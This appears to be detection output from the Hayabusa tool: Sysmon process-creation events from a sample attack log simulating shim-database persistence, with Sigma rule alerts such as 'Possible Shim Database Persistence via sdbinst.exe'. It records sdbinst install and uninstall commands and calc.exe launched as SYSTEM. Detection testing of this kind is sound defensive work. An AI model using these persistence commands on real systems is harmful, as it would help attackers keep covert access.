+2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe   :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe  :  Path: C:\Windows\System32\lsm.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe  :  Path: C:\Windows\System32\VBoxService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup  :  Path: C:\Windows\System32\gpscript.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe""  :  Path: C:\Program Files\freeSSHd\FreeSSHDService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe""  :  Path: C:\Windows\System32\taskhost.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe""  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe""   :  Path: C:\Windows\PSEXESVC.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg  *  ""hello from run key""  :  Path: C:\Windows\System32\msg.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe""  :  Path: C:\Program Files\Windows Media Player\wmpnetwk.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe""   :  Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
